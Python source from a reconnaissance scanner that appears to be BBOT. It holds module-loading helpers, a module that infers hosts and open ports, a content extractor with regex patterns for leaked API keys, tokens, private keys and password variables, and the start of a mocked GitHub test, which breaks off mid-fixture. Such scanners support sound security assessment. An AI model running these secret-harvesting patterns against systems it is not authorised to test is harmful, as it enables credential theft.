        for module_name, preloaded in self.filter_modules(modules, mod_type):
            module_type = preloaded["type"]
            consumed_events = sorted(preloaded.get("watched_events", []))
            produced_events = sorted(preloaded.get("produced_events", []))
            flags = sorted(preloaded.get("flags", []))
            api_key_required = ""
            meta = preloaded.get("meta", {})
            api_key_required = "Yes" if meta.get("auth_required", False) else "No"
            description = meta.get("description", "")
            table.append(
                [
                    module_name,
                    module_type,
                    api_key_required,
                    description,
                    ", ".join(flags),
                    ", ".join(consumed_events),
                    ", ".join(produced_events),
                ]
            )
        return make_table(table, header, maxcolwidths=maxcolwidths)

    def modules_options(self, modules=None, mod_type=None):
        """
        Return a list of module options
        """
        modules_options = {}
        for module_name, preloaded in self.filter_modules(modules, mod_type):
            modules_options[module_name] = []
            module_type = preloaded["type"]
            module_options = preloaded["config"]
            module_options_desc = preloaded["options_desc"]
            for k, v in sorted(module_options.items(), key=lambda x: x[0]):
                module_key = "modules"
                if module_type in ("internal", "output"):
                    module_key = f"{module_type}_modules"
                option_name = f"{module_key}.{module_name}.{k}"
                option_type = type(v).__name__
                option_description = module_options_desc[k]
                modules_options[module_name].append((option_name, option_type, option_description, str(v)))
        return modules_options

    def modules_options_table(self, modules=None, mod_type=None):
        table = []
        header = ["Config Option", "Type", "Description", "Default"]
        for module_name, module_options in self.modules_options(modules, mod_type).items():
            table += module_options
        return make_table(table, header)

    def flags(self, flags=None):
        _flags = {}
        for module_name, preloaded in self.preloaded().items():
            for flag in preloaded.get("flags", []):
                if not flags or flag in flags:
                    try:
                        _flags[flag].add(module_name)
                    except KeyError:
                        _flags[flag] = {module_name}

        _flags = sorted(_flags.items(), key=lambda x: x[0])
        _flags = sorted(_flags, key=lambda x: len(x[-1]), reverse=True)
        return _flags

    def flags_table(self, flags=None):
        table = []
        header = ["Flag", "# Modules", "Description", "Modules"]
        maxcolwidths = [20, 5, 40, 80]
        _flags = self.flags(flags=flags)
        for flag, modules in _flags:
            description = flag_descriptions.get(flag, "")
            table.append([flag, f"{len(modules)}", description, ", ".join(sorted(modules))])
        return make_table(table, header, maxcolwidths=maxcolwidths)

    def events(self):
        consuming_events = {}
        producing_events = {}
        for module_name, preloaded in self.preloaded().items():
            consumed = preloaded.get("watched_events", [])
            produced = preloaded.get("produced_events", [])
            for c in consumed:
                try:
                    consuming_events[c].add(module_name)
                except KeyError:
                    consuming_events[c] = {module_name}
            for c in produced:
                try:
                    producing_events[c].add(module_name)
                except KeyError:
                    producing_events[c] = {module_name}
        return consuming_events, producing_events

    def events_table(self):
        table = []
        header = ["Event Type", "# Consuming Modules", "# Producing Modules", "Consuming Modules", "Producing Modules"]
        consuming_events, producing_events = self.events()
        all_event_types = sorted(set(consuming_events).union(set(producing_events)))
        for e in all_event_types:
            consuming = sorted(consuming_events.get(e, []))
            producing = sorted(producing_events.get(e, []))
            table.append([e, len(consuming), len(producing), ", ".join(consuming), ", ".join(producing)])
        return make_table(table, header)

    def filter_modules(self, modules=None, mod_type=None):
        if modules is None:
            module_list = list(self.preloaded(type=mod_type).items())
        else:
            module_list = [(m, self._preloaded[m]) for m in modules]
        module_list.sort(key=lambda x: x[0])
        module_list.sort(key=lambda x: "passive" in x[-1]["flags"])
        module_list.sort(key=lambda x: x[-1]["type"], reverse=True)
        return module_list


module_loader = ModuleLoader()



import random
import ipaddress

from bbot.core.helpers import validators
from bbot.modules.internal.base import BaseInternalModule


class speculate(BaseInternalModule):
    """
    Bridge the gap between ranges and ips, or ips and open ports
    in situations where e.g. a port scanner isn't enabled
    """

    watched_events = [
        "IP_RANGE",
        "URL",
        "URL_UNVERIFIED",
        "DNS_NAME",
        "DNS_NAME_UNRESOLVED",
        "IP_ADDRESS",
        "HTTP_RESPONSE",
        "STORAGE_BUCKET",
        "SOCIAL",
        "AZURE_TENANT",
        "USERNAME",
    ]
    produced_events = ["DNS_NAME", "OPEN_TCP_PORT", "IP_ADDRESS", "FINDING", "ORG_STUB"]
    flags = ["passive"]
    meta = {"description": "Derive certain event types from others by common sense"}

    options = {"max_hosts": 65536, "ports": "80,443"}
    options_desc = {
        "max_hosts": "Max number of IP_RANGE hosts to convert into IP_ADDRESS events",
        "ports": "The set of ports to speculate on",
    }
    scope_distance_modifier = 1
    _priority = 4

    async def setup(self):
        scan_modules = [m for m in self.scan.modules.values() if m._type == "scan"]
        self.open_port_consumers = any(["OPEN_TCP_PORT" in m.watched_events for m in scan_modules])
        # only consider active portscanners (still speculate if only passive ones are enabled)
        self.portscanner_enabled = any(
            ["portscan" in m.flags and "active" in m.flags for m in self.scan.modules.values()]
        )
        self.emit_open_ports = self.open_port_consumers and not self.portscanner_enabled
        self.range_to_ip = True
        self.dns_resolution = self.scan.config.get("dns_resolution", True)
        self.org_stubs_seen = set()

        port_string = self.config.get("ports", "80,443")
        try:
            self.ports = self.helpers.parse_port_string(str(port_string))
        except ValueError as e:
            return False, f"Error parsing ports: {e}"

        if not self.portscanner_enabled:
            self.info(f"No portscanner enabled. Assuming open ports: {', '.join(str(x) for x in self.ports)}")

        target_len = len(self.scan.target)
        if target_len > self.config.get("max_hosts", 65536):
            if not self.portscanner_enabled:
                self.hugewarning(
                    f"Selected target ({target_len:,} hosts) is too large, skipping IP_RANGE --> IP_ADDRESS speculation"
                )
                self.hugewarning(f"Enabling a port scanner (nmap or masscan) module is highly recommended")
            self.range_to_ip = False

        return True

    async def handle_event(self, event):
        # generate individual IP addresses from IP range
        if event.type == "IP_RANGE" and self.range_to_ip:
            net = ipaddress.ip_network(event.data)
            ips = list(net)
            random.shuffle(ips)
            for ip in ips:
                await self.emit_event(ip, "IP_ADDRESS", source=event, internal=True)

        # parent domains
        if event.type == "DNS_NAME":
            parent = self.helpers.parent_domain(event.data)
            if parent != event.data:
                await self.emit_event(parent, "DNS_NAME", source=event, internal=True)

        # we speculate on distance-1 stuff too, because distance-1 open ports are needed by certain modules like sslcert
        event_in_scope_distance = event.scope_distance <= (self.scan.scope_search_distance + 1)
        speculate_open_ports = self.emit_open_ports and event_in_scope_distance

        # URL --> OPEN_TCP_PORT
        if event.type == "URL" or (event.type == "URL_UNVERIFIED" and self.open_port_consumers):
            # only speculate port from a URL if it wouldn't be speculated naturally from the host
            if event.host and (event.port not in self.ports or not speculate_open_ports):
                await self.emit_event(
                    self.helpers.make_netloc(event.host, event.port),
                    "OPEN_TCP_PORT",
                    source=event,
                    internal=True,
                    quick=(event.type == "URL"),
                )

        # speculate sub-directory URLS from URLS
        if event.type == "URL":
            url_parents = self.helpers.url_parents(event.data)
            for up in url_parents:
                url_event = self.make_event(f"{up}/", "URL_UNVERIFIED", source=event)
                if url_event is not None:
                    # inherit web spider distance from parent (don't increment)
                    source_web_spider_distance = getattr(event, "web_spider_distance", 0)
                    url_event.web_spider_distance = source_web_spider_distance
                    await self.emit_event(url_event)

        # speculate URL_UNVERIFIED from URL or any event with "url" attribute
        event_is_url = event.type == "URL"
        event_has_url = isinstance(event.data, dict) and "url" in event.data
        if event_is_url or event_has_url:
            if event_is_url:
                url = event.data
            else:
                url = event.data["url"]
            if not any(e.type == "URL_UNVERIFIED" and e.data == url for e in event.get_sources()):
                tags = None
                if self.helpers.is_spider_danger(event.source, url):
                    tags = ["spider-danger"]
                await self.emit_event(url, "URL_UNVERIFIED", tags=tags, source=event)

        # from hosts
        if speculate_open_ports:
            # don't act on unresolved DNS_NAMEs
            usable_dns = False
            if event.type == "DNS_NAME":
                if (not self.dns_resolution) or ("a-record" in event.tags or "aaaa-record" in event.tags):
                    usable_dns = True

            if event.type == "IP_ADDRESS" or usable_dns:
                for port in self.ports:
                    await self.emit_event(
                        self.helpers.make_netloc(event.data, port),
                        "OPEN_TCP_PORT",
                        source=event,
                        internal=True,
                        quick=True,
                    )

        # storage buckets etc.
        self.helpers.cloud.speculate(event)

        # ORG_STUB from TLD, SOCIAL, AZURE_TENANT
        org_stubs = set()
        if event.type == "DNS_NAME" and event.scope_distance == 0:
            tldextracted = self.helpers.tldextract(event.data)
            registered_domain = getattr(tldextracted, "registered_domain", "")
            if registered_domain:
                tld_stub = getattr(tldextracted, "domain", "")
                if tld_stub:
                    decoded_tld_stub = self.helpers.smart_decode_punycode(tld_stub)
                    org_stubs.add(decoded_tld_stub)
                    org_stubs.add(self.helpers.unidecode(decoded_tld_stub))
        elif event.type == "SOCIAL":
            stub = event.data.get("stub", "")
            if stub:
                org_stubs.add(stub.lower())
        elif event.type == "AZURE_TENANT":
            tenant_names = event.data.get("tenant-names", [])
            org_stubs.update(set(tenant_names))
        for stub in org_stubs:
            stub_hash = hash(stub)
            if stub_hash not in self.org_stubs_seen:
                self.org_stubs_seen.add(stub_hash)
                stub_event = self.make_event(stub, "ORG_STUB", source=event)
                if stub_event:
                    if event.scope_distance > 0:
                        stub_event.scope_distance = event.scope_distance
                    await self.emit_event(stub_event)

        # USERNAME --> EMAIL
        if event.type == "USERNAME":
            email = event.data.split(":", 1)[-1]
            if validators.soft_validate(email, "email"):
                email_event = self.make_event(email, "EMAIL_ADDRESS", source=event, tags=["affiliate"])
                if email_event:
                    email_event.scope_distance = event.scope_distance
                    await self.emit_event(email_event)

    async def filter_event(self, event):
        # don't accept errored DNS_NAMEs
        if any(t in event.tags for t in ("unresolved", "a-error", "aaaa-error")):
            return False, "there were errors resolving this hostname"
        return True



import re
import html
import base64
import jwt as j
from urllib.parse import urljoin

from bbot.core.helpers.regexes import _email_regex, dns_name_regex
from bbot.modules.internal.base import BaseInternalModule


class BaseExtractor:
    # If using capture groups, be sure to name them beginning with "capture".
    regexes = {}

    def __init__(self, excavate):
        self.excavate = excavate
        self.compiled_regexes = {}
        for rname, r in self.regexes.items():
            self.compiled_regexes[rname] = re.compile(r)

    async def search(self, content, event, **kwargs):
        results = set()
        async for result, name in self._search(content, event, **kwargs):
            results.add((result, name))
        for result, name in results:
            await self.report(result, name, event, **kwargs)

    async def _search(self, content, event, **kwargs):
        for name, regex in self.compiled_regexes.items():
            # yield to event loop
            await self.excavate.helpers.sleep(0)
            for result in regex.findall(content):
                yield result, name

    async def report(self, result, name, event):
        pass


class CSPExtractor(BaseExtractor):
    regexes = {"CSP": r"(?i)(?m)Content-Security-Policy:.+$"}

    def extract_domains(self, csp):
        domains = dns_name_regex.findall(csp)
        unique_domains = set(domains)
        return unique_domains

    async def search(self, content, event, **kwargs):
        async for csp, name in self._search(content, event, **kwargs):
            extracted_domains = self.extract_domains(csp)
            for domain in extracted_domains:
                await self.report(domain, event, **kwargs)

    async def report(self, domain, event, **kwargs):
        await self.excavate.emit_event(domain, "DNS_NAME", source=event, tags=["affiliate"])


class HostnameExtractor(BaseExtractor):
    regexes = {}

    def __init__(self, excavate):
        for i, r in enumerate(excavate.scan.dns_regexes):
            self.regexes[f"dns_name_{i+1}"] = r.pattern
        super().__init__(excavate)

    async def report(self, result, name, event, **kwargs):
        await self.excavate.emit_event(result, "DNS_NAME", source=event)


class URLExtractor(BaseExtractor):
    url_path_regex = r"((?:\w|\d)(?:[\d\w-]+\.?)+(?::\d{1,5})?(?:/[-\w\.\(\)]*[-\w\.]+)*/?)"
    regexes = {
        "fulluri": r"(?i)" + r"([a-z]\w{1,15})://" + url_path_regex,
        "fullurl": r"(?i)" + r"(https?)://" + url_path_regex,
        "a-tag": r"<a\s+(?:[^>]*?\s+)?href=([\"'])(.*?)\1",
        "link-tag": r"<link\s+(?:[^>]*?\s+)?href=([\"'])(.*?)\1",
        "script-tag": r"<script\s+(?:[^>]*?\s+)?src=([\"'])(.*?)\1",
    }

    prefix_blacklist = ["javascript:", "mailto:", "tel:", "data:", "vbscript:", "about:", "file:"]

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.web_spider_links_per_page = self.excavate.scan.config.get("web_spider_links_per_page", 20)

    async def search(self, content, event, **kwargs):
        consider_spider_danger = kwargs.get("consider_spider_danger", True)
        web_spider_distance = getattr(event, "web_spider_distance", 0)

        result_hashes = set()
        results = []
        async for result in self._search(content, event, **kwargs):
            result_hash = hash(result[0])
            if result_hash not in result_hashes:
                result_hashes.add(result_hash)
                results.append(result)

        urls_found = 0
        for result, name in results:
            url_event = await self.report(result, name, event, **kwargs)
            if url_event is not None:
                url_in_scope = self.excavate.scan.in_scope(url_event)
                is_spider_danger = self.excavate.helpers.is_spider_danger(event, result)
                exceeds_max_links = urls_found >= self.web_spider_links_per_page and url_in_scope
                exceeds_redirect_distance = (not consider_spider_danger) and (
                    web_spider_distance > self.excavate.max_redirects
                )
                if is_spider_danger or exceeds_max_links or exceeds_redirect_distance:
                    reason = "its spider depth or distance exceeds the scan's limits"
                    if exceeds_max_links:
                        reason = f"it exceeds the max number of links per page ({self.web_spider_links_per_page})"
                    elif exceeds_redirect_distance:
                        reason = (
                            f"its spider distance exceeds the max number of redirects ({self.excavate.max_redirects})"
                        )
                    self.excavate.debug(f"Tagging {url_event} as spider-danger because {reason}")
                    url_event.add_tag("spider-danger")

                self.excavate.debug(f"Found URL [{result}] from parsing [{event.data.get('url')}] with regex [{name}]")
                await self.excavate.emit_event(url_event)
                if url_in_scope:
                    urls_found += 1

    async def _search(self, content, event, **kwargs):
        parsed = getattr(event, "parsed", None)
        for name, regex in self.compiled_regexes.items():
            # yield to event loop
            await self.excavate.helpers.sleep(0)
            for result in regex.findall(content):
                if name.startswith("full"):
                    protocol, other = result
                    result = f"{protocol}://{other}"

                elif parsed and name.endswith("-tag"):
                    path = html.unescape(result[1])

                    for p in self.prefix_blacklist:
                        if path.lower().startswith(p.lower()):
                            self.excavate.debug(
                                f"omitted result from a-tag parser because of blacklisted prefix [{p}]"
                            )
                            continue

                    if not self.compiled_regexes["fullurl"].match(path):
                        source_url = event.parsed.geturl()
                        result = urljoin(source_url, path)
                        # this is necessary to weed out mailto: and such
                        if not self.compiled_regexes["fullurl"].match(result):
                            continue
                    else:
                        result = path

                yield result, name

    async def report(self, result, name, event, **kwargs):
        parsed_uri = None
        try:
            parsed_uri = self.excavate.helpers.urlparse(result)
        except Exception as e:
            self.excavate.debug(f"Error parsing URI {result}: {e}")
        netloc = getattr(parsed_uri, "netloc", None)
        if netloc is None:
            return
        host, port = self.excavate.helpers.split_host_port(parsed_uri.netloc)
        # Handle non-HTTP URIs (ftp, s3, etc.)
        if not "http" in parsed_uri.scheme.lower():
            # these findings are pretty mundane so don't bother with them if they aren't in scope
            abort_if = lambda e: e.scope_distance > 0
            event_data = {"host": str(host), "description": f"Non-HTTP URI: {result}"}
            parsed_url = getattr(event, "parsed", None)
            if parsed_url:
                event_data["url"] = parsed_url.geturl()
            await self.excavate.emit_event(
                event_data,
                "FINDING",
                source=event,
                abort_if=abort_if,
            )
            protocol_data = {"protocol": parsed_uri.scheme, "host": str(host)}
            if port:
                protocol_data["port"] = port
            await self.excavate.emit_event(
                protocol_data,
                "PROTOCOL",
                source=event,
                abort_if=abort_if,
            )
            return

        return self.excavate.make_event(result, "URL_UNVERIFIED", source=event)


class EmailExtractor(BaseExtractor):
    regexes = {"email": _email_regex}
    tld_blacklist = ["png", "jpg", "jpeg", "bmp", "ico", "gif", "svg", "css", "ttf", "woff", "woff2"]

    async def report(self, result, name, event, **kwargs):
        result = result.lower()
        tld = result.split(".")[-1]
        if tld not in self.tld_blacklist:
            self.excavate.debug(f"Found email address [{result}] from parsing [{event.data.get('url')}]")
            await self.excavate.emit_event(result, "EMAIL_ADDRESS", source=event)


class ErrorExtractor(BaseExtractor):
    regexes = {
        "PHP:1": r"\.php on line [0-9]+",
        "PHP:2": r"\.php</b> on line <b>[0-9]+",
        "PHP:3": "Fatal error:",
        "Microsoft SQL Server:1": r"\[(ODBC SQL Server Driver|SQL Server|ODBC Driver Manager)\]",
        "Microsoft SQL Server:2": "You have an error in your SQL syntax; check the manual",
        "Java:1": r"\.java:[0-9]+",
        "Java:2": r"\.java\((Inlined )?Compiled Code\)",
        "Perl": r"at (\/[A-Za-z0-9\.]+)*\.pm line [0-9]+",
        "Python": r"File \"[A-Za-z0-9\-_\./]*\", line [0-9]+, in",
        "Ruby": r"\.rb:[0-9]+:in",
        "ASP.NET:1": "Exception of type",
        "ASP.NET:2": "--- End of inner exception stack trace ---",
        "ASP.NET:3": "Microsoft OLE DB Provider",
        "ASP.NET:4": r"Error ([\d-]+) \([\dA-F]+\)",
    }

    async def report(self, result, name, event, **kwargs):
        self.excavate.debug(f"Found error message from parsing [{event.data.get('url')}] with regex [{name}]")
        description = f"Error message Detected at Error Type: {name}"
        await self.excavate.emit_event(
            {"host": str(event.host), "url": event.data.get("url", ""), "description": description},
            "FINDING",
            source=event,
        )


class JWTExtractor(BaseExtractor):
    regexes = {"JWT": r"eyJ(?:[\w-]*\.)(?:[\w-]*\.)[\w-]*"}

    async def report(self, result, name, event, **kwargs):
        self.excavate.debug(f"Found JWT candidate [{result}]")
        try:
            j.decode(result, options={"verify_signature": False})
            jwt_headers = j.get_unverified_header(result)
            tags = []
            if jwt_headers["alg"].upper()[0:2] == "HS":
                tags = ["crackable"]
            description = f"JWT Identified [{result}]"
            await self.excavate.emit_event(
                {"host": str(event.host), "url": event.data.get("url", ""), "description": description},
                "FINDING",
                event,
                tags=tags,
            )

        except j.exceptions.DecodeError:
            self.excavate.debug(f"Error decoding JWT candidate {result}")


class SerializationExtractor(BaseExtractor):
    regexes = {
        "Java": r"(?:[^a-zA-Z0-9+/]|^)(rO0[a-zA-Z0-9+/]+={,2})",
        ".NET": r"(?:[^a-zA-Z0-9+/]|^)(AAEAAAD//[a-zA-Z0-9+/]+={,2})",
        "PHP (Array)": r"(?:[^a-zA-Z0-9+/]|^)(YTo[xyz0123456][a-zA-Z0-9+/]+={,2})",
        "PHP (String)": r"(?:[^a-zA-Z0-9+/]|^)(czo[xyz0123456][a-zA-Z0-9+/]+={,2})",
        "PHP (Object)": r"(?:[^a-zA-Z0-9+/]|^)(Tzo[xyz0123456][a-zA-Z0-9+/]+={,2})",
        "Possible Compressed": r"(?:[^a-zA-Z0-9+/]|^)(H4sIAAAAAAAA[a-zA-Z0-9+/]+={,2})",
    }

    async def report(self, result, name, event, **kwargs):
        description = f"{name} serialized object found: [{self.excavate.helpers.truncate_string(result,2000)}]"
        await self.excavate.emit_event(
            {"host": str(event.host), "url": event.data.get("url"), "description": description}, "FINDING", event
        )


class FunctionalityExtractor(BaseExtractor):
    regexes = {
        "File Upload Functionality": r"(<input[^>]+type=[\"']?file[\"']?[^>]+>)",
        "Web Service WSDL": r"(?i)((?:http|https)://[^\s]*?.(?:wsdl))",
    }

    async def report(self, result, name, event, **kwargs):
        description = f"{name} found"
        await self.excavate.emit_event(
            {"host": str(event.host), "url": event.data.get("url"), "description": description}, "FINDING", event
        )


class JavascriptExtractor(BaseExtractor):
    # based on on https://github.com/m4ll0k/SecretFinder/blob/master/SecretFinder.py

    regexes = {
        "google_api": r"AIza[0-9A-Za-z-_]{35}",
        "firebase": r"AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140}",
        "google_oauth": r"ya29\.[0-9A-Za-z\-_]+",
        "amazon_aws_access_key_id": r"A[SK]IA[0-9A-Z]{16}",
        "amazon_mws_auth_token": r"amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
        # "amazon_aws_url": r"s3\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\.s3\.amazonaws.com",
        # "amazon_aws_url2": r"[a-zA-Z0-9-\.\_]+\.s3\.amazonaws\.com",
        # "amazon_aws_url3": r"s3://[a-zA-Z0-9-\.\_]+",
        # "amazon_aws_url4": r"s3.amazonaws.com/[a-zA-Z0-9-\.\_]+",
        # "amazon_aws_url5": r"s3.console.aws.amazon.com/s3/buckets/[a-zA-Z0-9-\.\_]+",
        "facebook_access_token": r"EAACEdEose0cBA[0-9A-Za-z]+",
        "authorization_basic": r"(?i)basic [a-zA-Z0-9:_\+\/-]{4,100}={0,2}",
        "authorization_bearer": r"bearer [a-zA-Z0-9_\-\.=:_\+\/]{5,100}",
        "apikey": r"api(?:key|_key)\s?=\s?[\'\"\`][a-zA-Z0-9_\-]{5,100}[\'\"\`]",
        "mailgun_api_key": r"key-[0-9a-zA-Z]{32}",
        "paypal_braintree_access_token": r"access_token\$production\$[0-9a-z]{16}\$[0-9a-f]{32}",
        "square_oauth_secret": r"sq0csp-[ 0-9A-Za-z\-_]{43}|sq0[a-z]{3}-[0-9A-Za-z\-_]{22,43}",
        "square_access_token": r"sqOatp-[0-9A-Za-z\-_]{22}",
        "stripe_standard_api": r"sk_live_[0-9a-zA-Z]{24}",
        "stripe_restricted_api": r"rk_live_[0-9a-zA-Z]{24}",
        "github_access_token": r"[a-zA-Z0-9_-]*:[a-zA-Z0-9_\-]+@github\.com*",
        "rsa_private_key": r"-----BEGIN RSA PRIVATE KEY-----",
        "ssh_dsa_private_key": r"-----BEGIN DSA PRIVATE KEY-----",
        "ssh_dc_private_key": r"-----BEGIN EC PRIVATE KEY-----",
        "pgp_private_block": r"-----BEGIN PGP PRIVATE KEY BLOCK-----",
        "json_web_token": r"ey[A-Za-z0-9-_=]+\.[A-Za-z0-9-_=]+\.?[A-Za-z0-9-_.+/=]*$",
        "slack_token": r"\"api_token\":\"(xox[a-zA-Z]-[a-zA-Z0-9-]+)\"",
        "SSH_privKey": r"([-]+BEGIN [^\s]+ PRIVATE KEY[-]+[\s]*[^-]*[-]+END [^\s]+ PRIVATE KEY[-]+)",
        "possible_creds_var": r"(?:password|passwd|pwd|pass)\s*=+\s*['\"][^\s'\"]{1,60}['\"]",
    }

    async def report(self, result, name, event, **kwargs):
        # ensure that basic auth matches aren't false positives
        if name == "authorization_basic":
            try:
                b64test = base64.b64decode(result.split(" ", 1)[-1].encode())
                if b":" not in b64test:
                    return
            except (base64.binascii.Error, UnicodeDecodeError):
                return

        self.excavate.debug(f"Found Possible Secret in Javascript [{result}]")
        description = f"Possible secret in JS [{result}] Signature [{name}]"
        await self.excavate.emit_event(
            {"host": str(event.host), "url": event.data.get("url", ""), "description": description}, "FINDING", event
        )


class excavate(BaseInternalModule):
    watched_events = ["HTTP_RESPONSE"]
    produced_events = ["URL_UNVERIFIED"]
    flags = ["passive"]
    meta = {"description": "Passively extract juicy tidbits from scan data"}

    scope_distance_modifier = None

    async def setup(self):
        self.csp = CSPExtractor(self)
        self.hostname = HostnameExtractor(self)
        self.url = URLExtractor(self)
        self.email = EmailExtractor(self)
        self.error_extractor = ErrorExtractor(self)
        self.jwt = JWTExtractor(self)
        self.javascript = JavascriptExtractor(self)
        self.serialization = SerializationExtractor(self)
        self.functionality = FunctionalityExtractor(self)
        max_redirects = self.scan.config.get("http_max_redirects", 5)
        self.web_spider_distance = self.scan.config.get("web_spider_distance", 0)
        self.max_redirects = max(max_redirects, self.web_spider_distance)
        return True

    async def search(self, source, extractors, event, **kwargs):
        for e in extractors:
            await e.search(source, event, **kwargs)

    async def handle_event(self, event):
        data = event.data

        # HTTP_RESPONSE is a special case
        if event.type == "HTTP_RESPONSE":
            # handle redirects
            web_spider_distance = getattr(event, "web_spider_distance", 0)
            num_redirects = max(getattr(event, "num_redirects", 0), web_spider_distance)
            location = getattr(event, "redirect_location", "")
            # if it's a redirect
            if location:
                # get the url scheme
                scheme = self.helpers.is_uri(location, return_scheme=True)
                if scheme in ("http", "https"):
                    if num_redirects <= self.max_redirects:
                        # tag redirects to out-of-scope hosts as affiliates
                        url_event = self.make_event(location, "URL_UNVERIFIED", event, tags="affiliate")
                        if url_event is not None:
                            # inherit web spider distance from parent (don't increment)
                            source_web_spider_distance = getattr(event, "web_spider_distance", 0)
                            url_event.web_spider_distance = source_web_spider_distance
                            await self.emit_event(url_event)
                    else:
                        self.verbose(f"Exceeded max HTTP redirects ({self.max_redirects}): {location}")

            body = self.helpers.recursive_decode(event.data.get("body", ""))
            # Cloud extractors
            self.helpers.cloud.excavate(event, body)
            await self.search(
                body,
                [
                    self.hostname,
                    self.url,
                    self.email,
                    self.error_extractor,
                    self.jwt,
                    self.javascript,
                    self.serialization,
                    self.functionality,
                ],
                event,
                consider_spider_danger=True,
            )

            headers = self.helpers.recursive_decode(event.data.get("raw_header", ""))
            await self.search(
                headers,
                [self.hostname, self.url, self.email, self.error_extractor, self.jwt, self.serialization, self.csp],
                event,
                consider_spider_danger=False,
            )

        else:
            await self.search(
                str(data),
                [self.hostname, self.url, self.email, self.error_extractor, self.jwt, self.serialization],
                event,
            )



import subprocess
from pathlib import Path

from .base import ModuleTestBase


class TestGit_Clone(ModuleTestBase):
    config_overrides = {"modules": {"git_clone": {"api_key": "asdf"}}}
    modules_overrides = ["github_org", "speculate", "git_clone"]

    file_content = "https://admin:admin@the-internet.herokuapp.com/basic_auth"

    async def setup_before_prep(self, module_test):
        module_test.httpx_mock.add_response(url="https://api.github.com/zen")
        module_test.httpx_mock.add_response(
            url="https://api.github.com/orgs/blacklanternsecurity",
            json={
                "login": "blacklanternsecurity",
                "id": 25311592,
                "node_id": "MDEyOk9yZ2FuaXphdGlvbjI1MzExNTky",
                "url": "https://api.github.com/orgs/blacklanternsecurity",
                "repos_url": "https://api.github.com/orgs/blacklanternsecurity/repos",
                "events_url": "https://api.github.com/orgs/blacklanternsecurity/events",
                "hooks_url": "https://api.github.com/orgs/blacklanternsecurity/hooks",
                "issues_url": "https://api.github.com/orgs/blacklanternsecurity/issues",
                "members_url": "https://api.github.com/orgs/blacklanternsecurity/members{/member}",
                "public_members_url": "https://api.github.com/orgs/blacklanternsecurity/public_members{/member}",
                "avatar_url": "https://avatars.githubusercontent.com/u/25311592?v=4",
                "description": "Security Organization",
                "name": "Black Lantern Security",
                "company": None,
                "blog": "www.blacklanternsecurity.com",
                "location": "Charleston, SC",
                "email": None,
                "twitter_username": None,
                "is_verified": False,
                "has_organization_projects": True,
                "has_repository_projects": True,
                "public_repos": 70,
                "public_gists": 0,
                "followers": 415,
                "following": 0,
                "html_url": "https://github.com/blacklanternsecurity",
                "created_at": "2017-01-24T00:14:46Z",
                "updated_at": "2022-03-28T11:39:03Z",
                "archived_at": None,
                "type": "Organization",
            },
        )
        module_test.httpx_mock.add_response(
            url="https://api.github.com/orgs/blacklanternsecurity/repos?per_page=100&page=1",
            json=[
                {
                    "id": 459780477,
                    "node_id": "R_kgDOG2exfQ",
                    "name": "test_keys",
                    "full_name": "blacklanternsecurity/test_keys",
                    "private": False,
                    "owner": {
                        "login": "blacklanternsecurity",
                        "id": 79229934,
                        "node_id": "MDEyOk9yZ2FuaXphdGlvbjc5MjI5OTM0",
                        "avatar_url": "https://avatars.githubusercontent.com/u/79229934?v=4",
                        "gravatar_id": "",
                        "url": "https://api.github.com/users/blacklanternsecurity",
                        "html_url": "https://github.com/blacklanternsecurity",
                        "followers_url": "https://api.github.com/users/blacklanternsecurity/followers",
                        "following_url": "https://api.github.com/users/blacklanternsecurity/following{/other_user}",
                        "gists_url": "https://api.github.com/users/blacklanternsecurity/gists{/gist_id}",
                        "starred_url": "https://api.github.com/users/blacklanternsecurity/starred{/owner}{/repo}",
                        "subscriptions_url": "https://api.github.com/users/blacklanternsecurity/subscriptions",
                        "organizations_url": "https://api.github.com/users/blacklanternsecurity/orgs",
                        "repos_url": "https://api.github.com/users/blacklanternsecurity/repos",
                        "events_url": "https://api.github.com/users/blacklanternsecurity/events{/privacy}",
                        "received_events_url": "https://api.github.com/users/blacklanternsecurity/received_events",
                        "type": "Organization",
                        "site_admin": False,
                    },
                    "html_url": "https://github.com/blacklanternsecurity/test_keys",
                    "description": None,
                    "fork": False,
                    "url": "https://api.github.com/repos/blacklanternsecurity/test_keys",
                    "forks_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/forks",
                    "keys_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/keys{/key_id}",
                    "collaborators_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/collaborators{/collaborator}",
                    "teams_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/teams",
                    "hooks_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/hooks",
                    "issue_events_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/issues/events{/number}",
                    "events_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/events",
                    "assignees_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/assignees{/user}",
                    "branches_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/branches{/branch}",
                    "tags_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/tags",
                    "blobs_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/git/blobs{/sha}",
                    "git_tags_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/git/tags{/sha}",
                    "git_refs_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/git/refs{/sha}",
                    "trees_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/git/trees{/sha}",
                    "statuses_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/statuses/{sha}",
                    "languages_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/languages",
                    "stargazers_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/stargazers",
                    "contributors_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/contributors",
                    "subscribers_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/subscribers",
                    "subscription_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/subscription",
                    "commits_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/commits{/sha}",
                    "git_commits_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/git/commits{/sha}",
                    "comments_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/comments{/number}",
                    "issue_comment_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/issues/comments{/number}",
                    "contents_url": "https://api.github.com/repos/blacklanternsecurity/test_keys/contents/{+path}",
